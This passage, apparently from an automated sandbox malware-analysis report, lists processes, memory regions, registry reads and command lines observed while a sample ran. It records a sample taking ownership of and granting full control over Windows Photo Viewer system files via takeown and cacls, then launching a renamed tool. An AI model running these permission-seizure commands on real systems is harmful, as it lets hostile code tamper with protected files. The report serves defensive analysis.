| pagefile_0x000000007ece0000 | 0x7ece0000 | 0x7ed02fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ed04000 | 0x7ed04000 | 0x7ed04fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed09000 | 0x7ed09000 | 0x7ed0bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed0c000 | 0x7ed0c000 | 0x7ed0efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ed0f000 | 0x7ed0f000 | 0x7ed0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #157: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #157 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:59, Reason: Child Process |
| Unmonitor | End Time: 00:03:04, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9ec |
| Parent PID | 0x614 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
888
0x
91C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000c20000 | 0x00c20000 | 0x00c3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c20000 | 0x00c20000 | 0x00c2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000c30000 | 0x00c30000 | 0x00c33fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00c41fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00c40000 | 0x00c44fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000c50000 | 0x00c50000 | 0x00c63fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c70000 | 0x00c70000 | 0x00caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00ceffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000cf0000 | 0x00cf0000 | 0x00cf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d00000 | 0x00d00000 | 0x00d00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d10000 | 0x00d10000 | 0x00d11fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d20000 | 0x00dddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e20000 | 0x00e20000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e30000 | 0x00e30000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e30000 | 0x00e30000 | 0x00e6ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00e70000 | 0x00e99fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e70000 | 0x00e70000 | 0x00e70fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e80000 | 0x00e80000 | 0x00e80fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f20000 | 0x00f20000 | 0x0101ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001020000 | 0x01020000 | 0x0116ffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x053b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000053c0000 | 0x053c0000 | 0x05540fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005550000 | 0x05550000 | 0x0694ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x06950000 | 0x06c86fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e9e0000 | 0x7e9e0000 | 0x7eadffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eae0000 | 0x7eae0000 | 0x7eb02fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb06000 | 0x7eb06000 | 0x7eb08fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb09000 | 0x7eb09000 | 0x7eb0bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb0c000 | 0x7eb0c000 | 0x7eb0cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb0f000 | 0x7eb0f000 | 0x7eb0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #158: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #158 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "Graph.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:59, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Self Terminated |
| Monitor Duration | 00:00:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfe8 |
| Parent PID | 0x764 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
864
0x
60C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00033fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00250000 | 0x0030dfff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0466ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004570000 | 0x04570000 | 0x0466ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004670000 | 0x04670000 | 0x0478ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04790000 | 0x04ac6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f590000 | 0x7f590000 | 0x7f68ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f690000 | 0x7f690000 | 0x7f6b2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f6b6000 | 0x7f6b6000 | 0x7f6b8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6b9000 | 0x7f6b9000 | 0x7f6b9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6bc000 | 0x7f6bc000 | 0x7f6bcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f6bd000 | 0x7f6bd000 | 0x7f6bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 56, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x594, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #159: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #159 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:01, Reason: Child Process |
| Unmonitor | End Time: 00:03:14, Reason: Self Terminated |
| Monitor Duration | 00:00:13 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x73c |
| Parent PID | 0x23c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
5D8
0x
C7C
0x
C28
0x
354
0x
C78
0x
B90
0x
BA8
0x
D04
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000ec17d10000 | 0xec17d10000 | 0xec17d2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ec17d10000 | 0xec17d10000 | 0xec17d1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ec17d20000 | 0xec17d20000 | 0xec17d26fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ec17d30000 | 0xec17d30000 | 0xec17d43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ec17d50000 | 0xec17d50000 | 0xec17e4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ec17e50000 | 0xec17e50000 | 0xec17e53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ec17e60000 | 0xec17e60000 | 0xec17e61fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ec17e70000 | 0xec17e70000 | 0xec17e70fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ec17e80000 | 0xec17e80000 | 0xec17f7ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xec17f80000 | 0xec1803dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ec18040000 | 0xec18040000 | 0xec1813ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ec18140000 | 0xec18140000 | 0xec1821ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ec18140000 | 0xec18140000 | 0xec18146fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ec18150000 | 0xec18150000 | 0xec18150fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0xec18160000 | 0xec18193fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ec18160000 | 0xec18160000 | 0xec18160fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ec18170000 | 0xec18170000 | 0xec18170fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ec18180000 | 0xec18180000 | 0xec18182fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0xec18190000 | 0xec18190fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ec181a0000 | 0xec181a0000 | 0xec181a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ec18210000 | 0xec18210000 | 0xec1821ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0xec18220000 | 0xec182f5fff | Memory Mapped File | r |
|
|
|
- |
| sortdefault.nls | 0xec18220000 | 0xec18556fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ec18560000 | 0xec18560000 | 0xec1865ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ec18660000 | 0xec18660000 | 0xec1875ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ec18760000 | 0xec18760000 | 0xec1885ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ec18860000 | 0xec18860000 | 0xec1895ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ec18960000 | 0xec18960000 | 0xec18ae7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ec18af0000 | 0xec18af0000 | 0xec18c70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ec18c80000 | 0xec18c80000 | 0xec1a07ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ec1a080000 | 0xec1a080000 | 0xec1a1bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ec1a080000 | 0xec1a080000 | 0xec1a17ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ec1a1b0000 | 0xec1a1b0000 | 0xec1a1bffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0xec1a1c0000 | 0xec1a300fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df600000000 | 0x7df600000000 | 0x7ff5ffffffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff75743c000 | 0x7ff75743c000 | 0x7ff75743dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75743e000 | 0x7ff75743e000 | 0x7ff75743ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff757440000 | 0x7ff757440000 | 0x7ff75753ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff757540000 | 0x7ff757540000 | 0x7ff757562fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff757564000 | 0x7ff757564000 | 0x7ff757565fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff757566000 | 0x7ff757566000 | 0x7ff757566fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff757568000 | 0x7ff757568000 | 0x7ff757569fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75756a000 | 0x7ff75756a000 | 0x7ff75756bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75756c000 | 0x7ff75756c000 | 0x7ff75756dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff75756e000 | 0x7ff75756e000 | 0x7ff75756ffff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff757890000 | 0x7ff757896fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffc47230000 | 0x7ffc4727afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4cbd0000 | 0x7ffc4ce43fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffc511b0000 | 0x7ffc51332fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffc52d70000 | 0x7ffc52e05fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffc57970000 | 0x7ffc57a14fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Process #160: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #160 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:01, Reason: Child Process |
| Unmonitor | End Time: 00:03:07, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf70 |
| Parent PID | 0x4e8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
554
0x
4F4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000250000 | 0x00250000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x0025ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00263fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00271fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00273fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00293fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00323fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x00330fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00341fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00350000 | 0x0040dfff | Memory Mapped File | r |
|
|
|
